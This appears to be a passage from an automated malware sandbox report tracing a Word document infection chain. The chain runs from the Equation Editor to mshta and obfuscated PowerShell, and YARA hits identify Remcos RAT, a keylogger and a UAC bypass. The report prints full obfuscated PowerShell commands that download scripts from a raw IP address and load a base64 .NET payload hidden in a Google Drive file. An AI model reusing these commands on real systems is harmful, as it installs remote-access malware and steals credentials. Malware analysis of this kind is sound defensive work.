                                                                                                                                                                        Data Ascii: E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2
                                                                                                                                                                        Data Ascii: Ol~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46
                                                                                                                                                                        Data Ascii: 1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEF
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48
                                                                                                                                                                        Data Ascii: v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiH
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22
                                                                                                                                                                        Data Ascii: 0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7"@'m"
                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67
                                                                                                                                                                        Data Ascii: XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:11:26:06
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                        Imagebase:0x13f470000
                                                                                                                                                                        File size:1'423'704 bytes
                                                                                                                                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:11:26:28
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:543'304 bytes
                                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:11:26:33
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"
                                                                                                                                                                        Imagebase:0xc0000
                                                                                                                                                                        File size:13'312 bytes
                                                                                                                                                                        MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:11:26:37
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"
                                                                                                                                                                        Imagebase:0x1090000
                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:11:26:39
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe
                                                                                                                                                                        Imagebase:0x1090000
                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:11:26:42
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                        File size:2'140'808 bytes
                                                                                                                                                                        MD5 hash:F8F36858B9405FBE27377FD7E8FEC2F2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:11:26:43
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"
                                                                                                                                                                        Imagebase:0x820000
                                                                                                                                                                        File size:46'832 bytes
                                                                                                                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:11:26:49
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
                                                                                                                                                                        Imagebase:0xf20000
                                                                                                                                                                        File size:141'824 bytes
                                                                                                                                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:11:26:49
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                        Imagebase:0x1090000
                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:11:26:50
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                                                                                                                                                                        Imagebase:0x1090000
                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:11:27:20
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
